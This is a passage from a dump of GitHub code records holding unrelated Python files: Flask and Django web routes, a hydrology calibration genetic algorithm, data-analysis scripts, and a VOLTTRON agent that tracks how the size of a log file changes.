     [\n            f\"func Day{dayname}{s}(fp *bufio.Reader) string {{\",\n            '    return \"\"',\n            \"}\",\n            \"\",\n        ]\n    )\n\n\ndef gen_impl_file(year: int, day: int):\n    filename = get_filename_with_ext(day, \"go\")\n    modulename = YEAR_NAMES[year]\n    filepath = f\"./{modulename}/{filename}\"\n    if os.path.exists(filepath):\n        return\n    with open(filepath, mode=\"w\") as fp:\n        fp.writelines(\n            [\n                f\"package {modulename}\\n\\n\",\n                'import \"bufio\"\\n\\n',\n                get_function_template(day, True),\n                \"\\n\",\n                get_function_template(day, False),\n            ]\n        )\n\n\ndef gen_templates(year: int, day: int):\n    make_directories(year)\n    gen_input_file(year, day)\n    gen_impl_file(year, day)\n\n\ndef main():\n    args = sys.argv[1:]\n    # validate the argument count before indexing into args\n    if len(args) != 2:\n        print(\"Usage: ./newproblem.py [year] [day]\")\n        return\n    year = int(args[0])\n    day = int(args[1])\n\n    if year < 2015 or year > 2021:\n        print(f\"Invalid year: {year}\")\n        return\n\n    if day < 1 or day > 25:\n        print(f\"Invalid day: {day}\")\n        return\n\n    gen_templates(year, day)\n\n\nif __name__ == \"__main__\":\n    
main()\n","repo_name":"biesnecker/godvent","sub_path":"newproblem.py","file_name":"newproblem.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31927818376","text":"# A file to do the application initialization.\n\nfrom flask import Flask, request, jsonify\nfrom flask_migrate import Migrate\nfrom flask_bcrypt import Bcrypt\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n\n# App Definition\napp = Flask(__name__)\napp.config.update(\n PROPAGATE_EXCEPTIONS = True\n)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'\n\n# Encrypt and set up database\nbcrypt = Bcrypt(app)\ndb = SQLAlchemy(app)\ndb.init_app(app)\nmigrate = Migrate(app, db)\n\n# Create a session for the app to connect to the database\napp.config['SQLALCHEMY_DATABASE_URI']\nengine = create_engine(app.config['SQLALCHEMY_DATABASE_URI'], echo=False)\nsm = sessionmaker(bind=engine)\nDBSession = scoped_session(sm)\n\n__all__ = ['app', 'bcrypt', 'db', 'DBSession', 'migrate']\n","repo_name":"sconnel42/automation-server","sub_path":"app_def.py","file_name":"app_def.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29779186253","text":"from flask import Blueprint, render_template, request, url_for, flash, redirect\nfrom flask_login import login_required, current_user\nfrom datetime import datetime\nfrom . import db\nfrom .models import Author, Post\n\nmain = Blueprint('main', __name__)\n\n@main.route('/')\ndef index():\n return render_template('index.html')\n\n@main.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', name=current_user.name)\n \n@main.route('/journal')\n@login_required\ndef journal():\n ROWS_PER_PAGE = 10\n page = request.args.get('page', 1, type=int)\n\n posts = Post.query.paginate(page=page, per_page=ROWS_PER_PAGE)\n return render_template('journal.html', posts = posts)\n\n@main.route('/create', methods=['GET', 'POST'])\n@login_required\ndef create():\n if request.method == 'POST':\n init_mood = request.form.get('imood')\n title = request.form['title']\n content = request.form['content']\n final_mood = request.form.get('pmood')\n \n if not title:\n flash('Title is required!')\n elif not content:\n flash('Content is required!')\n elif not init_mood:\n flash('How were you feeling before writing?')\n elif not final_mood:\n flash('How were you feeling after writing?')\n else:\n\n new_add = Post(title=title, content='created: ' + str(datetime.now()) + ' -- ' + content, init_mood=init_mood, final_mood=final_mood)\n db.session.add(new_add)\n db.session.commit()\n\n return redirect(url_for('main.index'))\n return render_template('create.html', name=current_user.name)\n\n@main.route('//edit/', methods=('GET', 'POST'))\n@login_required\ndef edit(id):\n post = db.session.query(Post).get(id)\n\n if request.method == 'POST':\n init_mood = request.form.get('imood')\n title = request.form['title']\n content = request.form['content']\n final_mood = request.form.get('pmood')\n\n if not title:\n flash('Title is required!')\n elif not content:\n flash('Content is required!')\n elif not init_mood:\n flash('How were you feeling before writing?')\n elif not final_mood:\n flash('How were you feeling after writing?')\n else:\n post.title = title\n post.content = content\n post.init_mood = 
init_mood\n post.final_mood = final_mood\n db.session.commit()\n \n new_add = Post(title=title, content=content + ' -- edited: ' + str(datetime.now()), init_mood=init_mood, final_mood=final_mood)\n db.session.add(new_add)\n db.session.commit()\n\n return redirect(url_for('main.index'))\n\n return render_template('edit.html', post=post)\n\n\n@main.route('/speak', methods=('GET', 'POST'))\n@login_required\ndef speak():\n if request.method == 'POST':\n init_mood = request.form.get('imood')\n title = request.form['title']\n content = request.form['content']\n final_mood = request.form.get('pmood')\n\n if not title:\n flash('Title is required!')\n elif not content:\n flash('Content is required!')\n elif not init_mood:\n flash('How were you feeling before writing?')\n elif not final_mood:\n flash('How were you feeling after writing?')\n else:\n\n new_add = Post(title=title, content=content, init_mood=init_mood, final_mood=final_mood)\n db.session.add(new_add)\n db.session.commit()\n\n return redirect(url_for('main.index'))\n return render_template('speak.html')\n","repo_name":"H-Len/VentOn","sub_path":"project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2157082574","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom .forms import *\nfrom django.http import HttpResponse\n\ndef home(request):\n if request.method == 'POST':\n form = StudentForm(request.POST)\n # print(form)\n if form.is_valid():\n form.save()\n obj = Student.objects.all().order_by('-id').first() \n return redirect('profile',obj.id)\n if request.method == 'GET':\n form = StudentForm()\n c = {\n 'form': form,\n }\n return render(request, 'home.html',c)\n\ndef profile(request, pk):\n \n if request.method == 'GET':\n std = Student.objects.get(id=pk)\n c = {\n 'std': std,\n }\n return render(request, 'resume.html',c)\n ","repo_name":"aswathypmukesh/reume-generator","sub_path":"res/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15978485489","text":"import random\r\nimport DelineateNetwork\r\nimport numpy as np\r\nimport FileSettings\r\nimport CreateGuesses\r\nimport Objective_functions\r\nimport Generations\r\n\r\n\r\ndef read_initial_parameters(inputfilename):\r\n subc_params = []\r\n subarea_params = []\r\n global subc_names\r\n subc_names = []\r\n subcatchment_parameters = []\r\n inputfile = open(inputfilename, 'r')\r\n for line in inputfile:\r\n if(line.find(\"[SUBCATCHMENTS]\") != -1):\r\n line = inputfile.readline()\r\n for i in range(CreateGuesses.count):\r\n templine = list(line)\r\n if templine[0] == \";\" or templine[0] == \" \" or len(templine) < 10:\r\n line = inputfile.readline()\r\n continue\r\n\r\n elif (line.find(\"[\") != -1):\r\n break\r\n else:\r\n linesplit = line.split()\r\n subc_params.append(linesplit[4:7])\r\n subc_names.append(linesplit[0])\r\n line = inputfile.readline()\r\n if (line.find(\"[SUBAREAS]\") != -1):\r\n line = inputfile.readline()\r\n for i in range(CreateGuesses.count):\r\n templine = list(line)\r\n if templine[0] == \";\" or templine[0] == \" \" or len(templine) < 10:\r\n line = inputfile.readline()\r\n continue\r\n elif (line.find(\"[\") != -1):\r\n break\r\n else:\r\n linesplit = line.split()\r\n subarea_params.append(linesplit[1:6])\r\n line = inputfile.readline()\r\n inputfile.close()\r\n for 
i in range(len(subc_params)):\r\n for j in range(len(subarea_params[i])):\r\n subc_params[i].append(subarea_params[i][j])\r\n subcatchment_parameters.append(subc_params[i])\r\n return(subcatchment_parameters)\r\n#read_initial_parameters(inputfilename)\r\n\r\n\r\ndef transformation_flatten(twoDlistinput):\r\n oneDlistoutput = []\r\n for i in range(len(twoDlistinput)):\r\n for j in range(len(twoDlistinput[i])):\r\n oneDlistoutput.append(twoDlistinput[i][j])\r\n return(oneDlistoutput)\r\n\r\n\r\ndef compile_initial_guess(inputfilename):\r\n global relevant_subcatchment_indices, relevant_subcatchment_parameters\r\n relevant_subcatchment_indices = []\r\n for allsub in CreateGuesses.subc_names:\r\n for upstreamsub in DelineateNetwork.list_of_subcatchments:\r\n if allsub == upstreamsub:\r\n relevant_subcatchment_indices.append(CreateGuesses.subc_names.index(allsub))\r\n relevant_subcatchment_parameters = []\r\n for i in relevant_subcatchment_indices:\r\n relevant_subcatchment_parameters.append(read_initial_parameters(inputfilename)[i])\r\n initial_guess_flat = transformation_flatten(relevant_subcatchment_parameters)\r\n return(initial_guess_flat)\r\n#compile_initial_guess(inputfilename)\r\n\r\n\r\ndef caststringsasfloats(parameterlist):\r\n initial_guess_floats = []\r\n for guess in parameterlist:\r\n initial_guess_floats.append(float(guess))\r\n return(initial_guess_floats)\r\n\r\ndef createrandomsetofP(survivinglist):\r\n floatnexttemporaryguess = caststringsasfloats(crossover(survivinglist))\r\n for parameter in range(len(floatnexttemporaryguess)):\r\n binary_setter = random.uniform(0,1)\r\n if binary_setter > 0.1:\r\n continue\r\n else:\r\n if parameter % 8 == 0:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.percentimpervious[0], CreateGuesses.percentimpervious[1])\r\n elif parameter % 8 == 1:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.width[0], CreateGuesses.width[1])\r\n elif parameter % 8 == 2:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.slope[0], CreateGuesses.slope[1])\r\n elif parameter % 8 == 3:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.impervious_n[0], CreateGuesses.impervious_n[1])\r\n elif parameter % 8 == 4:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.pervious_n[0], CreateGuesses.pervious_n[1])\r\n elif parameter % 8 == 5:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.impervious_storage[0], CreateGuesses.impervious_storage[1])\r\n elif parameter % 8 == 6:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.pervious_storage[0], CreateGuesses.pervious_storage[1])\r\n elif parameter % 8 == 7:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.percent_zero_storage[0], CreateGuesses.percent_zero_storage[1])\r\n return(floatnexttemporaryguess)\r\n\r\n\r\ndef fillmatingpool(survivinglist):\r\n matingpool =[]\r\n dummylist = [x for x in survivinglist]\r\n for i in range(FileSettings.geneticdict['population']+10):\r\n choice1 = random.choice(dummylist)\r\n choice2 = random.choice(dummylist)\r\n while choice2 == choice1:\r\n choice2 = random.choice(dummylist)\r\n if Objective_functions.par_aggFunc[survivinglist.index(choice1)] < \\\r\n Objective_functions.par_aggFunc[survivinglist.index(choice2)]:\r\n matingpool.append(choice1)\r\n dummylist.remove(choice1)\r\n else:\r\n matingpool.append(choice2)\r\n dummylist.remove(choice2)\r\n\r\n global not_selected_list\r\n not_selected_list = dummylist\r\n 
return(matingpool)\r\n\r\n\r\ndef crossover(survivinglist):\r\n choice1 = random.choice(survivinglist)\r\n survivinglist.remove(choice1)\r\n choice2 = random.choice(survivinglist)\r\n #while choice2 == choice1:\r\n #choice2 = random.choice()\r\n choices = [choice1, choice2]\r\n Objective_functions.readobservationfile(FileSettings.settingsdict['observationdatafile'])\r\n Objective_functions.objectivefunctions(choices, FileSettings.settingsdict['observationdatafile'],\r\n FileSettings.settingsdict['distancefilename'],\r\n FileSettings.settingsdict['root'])\r\n guesses_Agg = Objective_functions.aggregateFunction()\r\n betterguess = choices[guesses_Agg.index(min(guesses_Agg))]\r\n worserguess = choices[guesses_Agg.index(max(guesses_Agg))]\r\n bettertemporaryguess = compile_initial_guess(betterguess)\r\n worsertemporaryguess = compile_initial_guess(worserguess)\r\n threshhold = random.uniform(0, FileSettings.geneticdict['crossover_bias'])\r\n for param in bettertemporaryguess:\r\n crossover_setter = random.uniform(0, 1)\r\n if crossover_setter > (threshhold + FileSettings.geneticdict['crossover_bias']):\r\n continue\r\n else:\r\n store = param\r\n worsertemporaryguess[bettertemporaryguess.index(param)] = store\r\n return(worsertemporaryguess)\r\n\r\n\r\ndef castfloatsasstrings(survivinglist):\r\n floattostring = createrandomsetofP(survivinglist)\r\n guess_strings = []\r\n for float in floattostring:\r\n guess_strings.append(str(float))\r\n return(guess_strings)\r\n\r\ndef transformation_fatten(oneDlistinput):\r\n new_twoDlistoutput = np.zeros((len(relevant_subcatchment_parameters[0]),len(relevant_subcatchment_parameters)))\r\n row_count = -1\r\n col_count = 0\r\n for oneDparameter in oneDlistinput:\r\n row_count = row_count + 1\r\n if row_count < len(relevant_subcatchment_parameters[0]):\r\n new_twoDlistoutput[row_count][col_count] = oneDparameter\r\n else:\r\n row_count = 0\r\n col_count = col_count + 1\r\n new_twoDlistoutput[row_count][col_count] = oneDparameter\r\n return(new_twoDlistoutput)\r\n\r\ndef insertguessestoinputfile(inputfilename, trialfile, survivinglist):\r\n guess = transformation_fatten(castfloatsasstrings(survivinglist))\r\n\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n swmmput.seek(0)\r\n for line in swmmput:\r\n if line.find('[SUBCATCHMENTS]') != -1:\r\n for i in range(CreateGuesses.count):\r\n line = swmmput.readline()\r\n linelist = list(line)\r\n if linelist[0] == \" \" or linelist[0] == \";\" or len(linelist) < 10:\r\n continue\r\n elif (line.find('[SUBAREAS]') != -1):\r\n break\r\n else:\r\n for sub in DelineateNetwork.list_of_subcatchments:\r\n templine = contents.index(line)\r\n splitline = contents[templine].split()\r\n if splitline[0] == sub:\r\n splitline[4] = str(guess[0][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[5] = str(guess[1][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[6] = str(guess[2][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n contents[templine] = \" \".join(splitline) + \"\\n\"\r\n break\r\n if line.find('[SUBAREAS]') != -1:\r\n for i in range(CreateGuesses.count):\r\n line = swmmput.readline()\r\n linelist = list(line)\r\n if linelist[0] == \" \" or linelist[0] == \";\" or len(linelist) < 10:\r\n continue\r\n elif (line.find('[') != -1):\r\n break\r\n else:\r\n for sub in DelineateNetwork.list_of_subcatchments:\r\n templine = contents.index(line)\r\n splitline = contents[templine].split()\r\n if splitline[0] == sub:\r\n splitline[1] = 
str(guess[3][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[2] = str(guess[4][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[3] = str(guess[5][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[4] = str(guess[6][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[5] = str(guess[7][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n contents[templine] = \" \".join(splitline) + '\\n'\r\n break\r\n with open(trialfile, 'w') as newfile:\r\n for i in range(CreateGuesses.count):\r\n newfile.write(contents[i])\r\n newfile.close()\r\n return\r\n\r\n\r\ndef create_next_generation(inputfilename, filelist, survivinglist):\r\n for trialfile in filelist:\r\n insertguessestoinputfile(inputfilename, trialfile, survivinglist)\r\n return\r\n\r\n","repo_name":"edwardtiernan/snake_game","sub_path":"NextGuesses.py","file_name":"NextGuesses.py","file_ext":"py","file_size_in_byte":10935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31631859113","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\nwn = tk.Tk()\r\n\r\n\r\ndef timeInWords(h, m):\r\n naming_time = [\"one\",\"two\",\"three\",\"four\",\"five\",\"six\",\"seven\",\"eight\",\"nine\",\"ten\",\"eleven\",\"twelve\"]\r\n naming_session = [\"one minute\",\"two minutes\",\"three minutes\",\"four minutes\",\"five minutes\",\"six minutes\",\"seven minutes\",\"eight minutes\",\"nine minutes\",\r\n\"ten minutes\",\"eleven minutes\",\"twelve minutes\",\"thirteen minutes\",\"fourteen minutes\",\"quarter\", \"sixteen minutes\",\"seventeen minutes\", \"eighteen minutes\",\r\n\"nineteen minutes\",\"twenty minutes\",\"twenty one minutes\",\"twenty two minutes\",\"twenty three minutes\",\"twenty four minutes\",\"twenty five minutes\",\r\n\"twenty six minutes\",\"twenty seven minutes\",\"twenty eight minutes\",\"twenty nine minutes\"]\r\n if m == 0:\r\n return (naming_time[h-1] + \" o' clock\")\r\n elif m < 30:\r\n return (naming_session[m-1] + \" past \" + naming_time[h-1])\r\n elif m > 30:\r\n m = 60 - m\r\n return (naming_session[m-1] + \" to \" + naming_time[h])\r\n else:\r\n return (\"half past \" + naming_time[h-1]) \r\n \r\ntime_entry = tk.Entry(wn)\r\noutput_label = tk.Label(wn, text = \" \" , ) \r\n\r\n\r\nh , m = map(int, input().split(\":\"))\r\n\r\nresult = timeInWords(h, m)\r\n\r\nprint(result + '\\n')\r\n\r\nwn.mainloop()","repo_name":"Sunillad08/Python_code","sub_path":"Timing clock.py","file_name":"Timing clock.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12195258672","text":"import matplotlib.pyplot as plt\n\nimport ytgeotools\nfrom ytgeotools.seismology.collections import DepthSeriesKMeans\n\nvs_file = \"IRIS/wUS-SH-2010_percent.nc\"\nds = ytgeotools.open_dataset(vs_file)\nP = ds.profiler.get_profiles(\"dvs\")\n\nmodel = DepthSeriesKMeans(P, n_clusters=3)\nmodel.fit()\ndf = model.get_classified_coordinates()\ndf.plot(\"labels\")\n\nkmeans_stats = model.depth_stats()\nplt.figure()\nc = [\"r\", \"g\", \"b\", \"c\", \"m\"]\nfor i in range(model.n_clusters):\n minvals = kmeans_stats[i][\"two_sigma_min\"]\n maxvals = kmeans_stats[i][\"two_sigma_max\"]\n plt.plot(model.cluster_centers_[i, :], model.profile_collection.depth, 
color=c[i])\nplt.gca().invert_yaxis()\n\nplt.show()\n","repo_name":"chrishavlin/ytgeotools","sub_path":"examples/kmeans_profiles.py","file_name":"kmeans_profiles.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74876550866","text":"\nimport datetime\n\nimport numpy\nimport pandas\nimport jax\n\nimport xtuples as xt\nimport xjd\n\n\ndef test_ppca_naive() -> bool:\n xjd.utils.rand.reset_keys()\n\n N = 3\n\n ds = xjd.utils.dates.starting(datetime.date(2020, 1, 1), 100)\n\n N_COLS = 5\n\n vs_norm = xjd.utils.rand.gaussian((100, N,))\n betas = xjd.utils.rand.gaussian((N, N_COLS,))\n vs = numpy.matmul(vs_norm, betas)\n\n NOISE = 1\n\n data = (\n pandas.DataFrame({\n f: xjd.utils.dates.dated_series({d: v for d, v in zip(ds, fvs)})\n for f, fvs in enumerate(numpy.array(vs).T)\n }),\n )\n\n model, loc_data = xjd.Model().add_node(\n xjd.inputs.dfs.DataFrame_Wide(),\n input=True,\n )\n model, loc_weights = model.add_node(\n xjd.params.random.Orthogonal(\n shape=(N_COLS, N + NOISE,)\n )\n )\n model, loc_encode = model.add_node(\n xjd.pca.vanilla.PCA_Encoder(\n data=loc_data.result(),\n weights = loc_weights.param(),\n n=N + NOISE,\n #\n )\n )\n model, loc_decode = model.add_node(\n xjd.pca.vanilla.PCA_Decoder(\n weights = loc_weights.param(),\n factors=loc_encode.result(),\n #\n )\n )\n model = (\n model.add_node(xjd.constraints.loss.MSE(\n l=loc_data.result(),\n r=loc_decode.result(),\n ), constraint=True)\n .add_node(xjd.constraints.linalg.EigenVLike(\n weights = loc_weights.param(),\n factors=loc_encode.result(),\n n_check=N + NOISE,\n ), constraint=True)\n .init(data)\n )\n\n model = model.optimise(data).apply(data)\n \n eigen_vec = weights = loc_weights.param().access(model)\n factors = loc_encode.result().access(model)\n\n cov = jax.numpy.cov(factors.T)\n eigen_vals = jax.numpy.diag(cov)\n\n order = numpy.flip(numpy.argsort(eigen_vals))[:N]\n assert eigen_vals.shape[0] == N + 1, eigen_vals.shape\n\n eigen_vals = eigen_vals[order]\n eigen_vec = eigen_vec[..., order]\n\n eigvals, eigvecs = numpy.linalg.eig(numpy.cov(\n numpy.transpose(data[0].values)\n ))\n _order = numpy.flip(numpy.argsort(eigvals))[:N]\n eigvecs = eigvecs[..., _order]\n # assert False, (eigvals, eigen_vals,)\n\n eigvecs = xjd.utils.funcs.set_signs_to(\n eigvecs, 1, numpy.ones(eigvecs.shape[1])\n )\n eigen_vec = xjd.utils.funcs.set_signs_to(\n eigen_vec, 1, numpy.ones(eigen_vec.shape[1])\n )\n\n print(eigen_vec)\n print(eigvecs)\n\n # for now we just check pc1 matches\n xjd.utils.tests.assert_is_close(\n eigen_vec.real[..., :1],\n eigvecs.real[..., :1],\n True,\n atol=.1,\n )\n return True","repo_name":"tomjrwilliams/xjd","sub_path":"tests/test_ppca_naive.py","file_name":"test_ppca_naive.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"281329514","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport redis 
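# Translate the pinyin province keys fetched from Redis into their Chinese display names via PROVINCE_MAP below.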
\n\nPROVINCE_MAP={\"BeiJing\":\"北京\",\"ShangHai\":\"上海\",\"TianJin\":\"天津\",\"ChongQing\":\"重庆\",\"XiangGang\":\"香港\",\"Aomen\":\"澳门\",\"AnHui\":\"安徽\",\"FuJian\":\"福建\",\"GuangDong\":\"广东\",\"GuangXi\":\"广西\",\"GuiZhou\":\"贵州\",\"GanSu\":\"甘肃\",\"HaiNan\":\"海南\",\"HeBei\":\"河北\",\"HeNan\":\"河南\",\"HeiLongJiang\":\"黑龙江\",\"HuBei\":\"湖北\",\"HuNan\":\"湖南\",\"JiLin\":\"吉林\",\"JiangSu\":\"江苏\",\"JiangXi\":\"江西\",\"LiaoNing\":\"辽宁\",\"NeiMengGu\":\"内蒙古\",\"NingXia\":\"宁夏\",\"QingHai\":\"青海\",\"ShanXi1\":\"山西\",\"ShanXi3\":\"陕西\",\"ShanDong\":\"山东\",\"SiChuan\":\"四川\",\"TaiWan\":\"台湾\",\"XiZang\":\"西藏\",\"XinJiang\":\"新疆\",\"YunNan\":\"云南\",\"ZheJiang\":\"浙江\"}\n\nclass Redis_Query:\n\n def query_province(self):\n r = redis.StrictRedis(host='127.0.0.1', port=6379)\n return r.hgetall('province') \n\n def get_province_price(self,dict):\n china_price={}\n for k,v in dict.items():\n if k in PROVINCE_MAP:\n new_key=PROVINCE_MAP[k]\n china_price[new_key]=v\n return china_price\n","repo_name":"bigdataguide/hadooptraining","sub_path":"visualization/py-echarts/query_redis.py","file_name":"query_redis.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"48"} +{"seq_id":"24552169246","text":"import datetime\nimport logging\nimport os\nimport sys\nimport statistics\n\nfrom volttron.platform.vip.agent import Agent, RPC, Core\nfrom volttron.platform.agent import utils\nfrom volttron.platform.agent.utils import get_aware_utc_now\n\nutils.setup_logging()\n_log = logging.getLogger(__name__)\n__version__ = '1.0'\n\n\ndef log_statistics(config_path, **kwargs):\n \"\"\"Load the LogStatisticsAgent agent configuration and returns and instance\n of the agent created using that configuration.\n\n :param config_path: Path to a configuration file.\n\n :type config_path: str\n :returns: LogStatisticsAgent agent instance\n :rtype: LogStatisticsAgent agent\n \"\"\"\n config = utils.load_config(config_path)\n return LogStatisticsAgent(config, **kwargs)\n\n\nclass LogStatisticsAgent(Agent):\n \"\"\"\n LogStatisticsAgent reads volttron.log file size every hour,\n compute the size delta from previous hour and publish the difference\n with timestamp. It also publishes standard deviation every 24 hours.\n :param config: Configuration dict\n :type config: dict\n\n Example configuration:\n .. 
code-block:: python\n {\n \"file_path\" : \"/home/volttron/volttron.log\",\n \"analysis_interval_sec\" : 60,\n \"publish_topic\" : \"platform/log_statistics\",\n \"historian_topic\" : \"analysis/log_statistics\"\n }\n \"\"\"\n\n def __init__(self, config, **kwargs):\n super(LogStatisticsAgent, self).__init__(**kwargs)\n self.analysis_interval_sec = config[\"analysis_interval_sec\"]\n self.file_path = config[\"file_path\"]\n self.publish_topic = config[\"publish_topic\"]\n self.historian_topic = config[\"historian_topic\"]\n self.size_delta_list = []\n self.file_start_size = None\n self.prev_file_size = None\n self._scheduled_event = None\n\n @Core.receiver('onstart')\n def starting(self, sender, **kwargs):\n _log.info(\"Starting \" + self.__class__.__name__ + \" agent\")\n self.publish_analysis()\n\n def publish_analysis(self):\n \"\"\"\n Publishes the file's size increment over the previous analysis interval,\n with timestamp.\n Also publishes the standard deviation of the collected size deltas\n every 24 intervals.\n \"\"\"\n if self._scheduled_event is not None:\n self._scheduled_event.cancel()\n\n if self.prev_file_size is None:\n self.prev_file_size = self.get_file_size()\n _log.debug(\"init_file_size = {}\".format(self.prev_file_size))\n else:\n # read file size\n curr_file_size = self.get_file_size()\n\n # calculate size delta\n size_delta = curr_file_size - self.prev_file_size\n self.prev_file_size = curr_file_size\n\n self.size_delta_list.append(size_delta)\n\n headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}\n\n publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',\n 'log_size_delta': size_delta}\n historian_message = [{\"log_size_delta \": size_delta},\n {\"log_size_delta \": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]\n\n if len(self.size_delta_list) == 24:\n standard_deviation = statistics.stdev(self.size_delta_list)\n publish_message['log_std_dev'] = standard_deviation\n historian_message[0]['log_std_dev'] = standard_deviation\n historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}\n\n _log.debug('publishing message {} with header {} on historian topic {}'\n .format(historian_message, headers, self.historian_topic))\n self.vip.pubsub.publish(peer=\"pubsub\", topic=self.historian_topic, headers = headers,\n message=historian_message)\n\n self.size_delta_list = []\n\n _log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))\n self.vip.pubsub.publish(peer=\"pubsub\", topic=self.publish_topic,\n message=publish_message)\n\n _log.debug('Scheduling next periodic call')\n now = get_aware_utc_now()\n next_update_time = now + datetime.timedelta(\n seconds=self.analysis_interval_sec)\n\n self._scheduled_event = self.core.schedule(\n next_update_time, self.publish_analysis)\n\n def get_file_size(self):\n try:\n return os.path.getsize(self.file_path)\n except OSError as e:\n _log.error(str(e))\n\n\ndef main(argv=sys.argv):\n \"\"\"Main method called by the platform.\"\"\"\n utils.vip_main(log_statistics, identity='platform.logstatisticsagent')\n\n\nif __name__ == '__main__':\n # Entry point for script\n try:\n sys.exit(main())\n except KeyboardInterrupt:\n pass\n","repo_name":"cyrus19901/volttron-homeassistant","sub_path":"services/core/LogStatisticsAgent/logstatisticsagent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
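The agent record above reduces to simple bookkeeping: sample a file's size on a fixed interval, publish the per-interval delta, and emit a standard deviation once 24 deltas have accumulated. Below is a minimal, framework-free sketch of that loop; the path and interval are placeholder assumptions, and plain print calls stand in for the VOLTTRON pub/sub plumbing.

import os
import statistics
import time

LOG_PATH = "/tmp/example.log"  # placeholder path, not taken from the record above
INTERVAL_SEC = 60              # placeholder sampling interval

def watch(path=LOG_PATH, interval_sec=INTERVAL_SEC, window=24):
    # Mirror the agent's state: the previously seen size plus a rolling list of deltas.
    prev_size = os.path.getsize(path)
    deltas = []
    while True:
        time.sleep(interval_sec)
        curr_size = os.path.getsize(path)
        deltas.append(curr_size - prev_size)
        prev_size = curr_size
        print({"log_size_delta": deltas[-1]})  # stand-in for vip.pubsub.publish
        if len(deltas) == window:
            # statistics.stdev needs at least two samples; the 24-delta window satisfies that.
            print({"log_std_dev": statistics.stdev(deltas)})
            deltas = []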
+{"seq_id":"28570483029","text":"import pandas as pd\nfrom scipy import stats\n\nnovel_counts = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\t_exp_median.csv', index_col = 0)\nall_counts_df = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\quantification\\\\all_counts.csv', index_col = 0)\nnovel_t2g = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\all_novel_list.txt', index_col = 0, names = ['gene'], sep = '\\t')\nDE_novel = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\NovelQuant_pipeline\\\\lncRNA\\\\intersec_novel_lncRNA.csv', index_col = 0)\nDE_anno = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lncRNA\\\\DE_anno_mRNA.csv', index_col = 0)\nanno_t2g = pd.read_csv('D:\\\\MCGDYY\\\\ont_project\\\\lists\\\\anno_mRNA_trans.txt', index_col = 1, names = ['gene', 'xx', 'xxx'], sep = '\\t')\n\nDE_novel_list = list(i.split('_')[0] for i in DE_novel.index)\nclean_novel = pd.DataFrame()\nfor i in DE_novel_list:\n\tclean_novel = pd.concat((clean_novel, novel_counts[i + '_T']), axis = 1)\nclean_novel.columns = [i.split('_')[0] for i in clean_novel.columns]\n\nDE_anno_list = list(DE_anno.index)\nclean_anno = pd.DataFrame()\nall_counts = all_counts_df.T\nfor i in DE_anno_list:\n\tclean_anno = pd.concat((clean_anno, all_counts[i]), axis = 1)\nclean_anno = clean_anno[clean_anno.index.str.contains('-1')]\nclean_anno.index = [i.split('-')[0] for i in clean_anno.index]\nclean_anno = clean_anno.drop(index = '1848')\t# 1848 has no clinical info\n\n# calculate Spearman's correlation\nsum_table = pd.DataFrame()\nsig_table = pd.DataFrame()\nfor i in clean_novel.columns:\n\tg1 = novel_t2g.loc[i, 'gene']\n\tfor k in 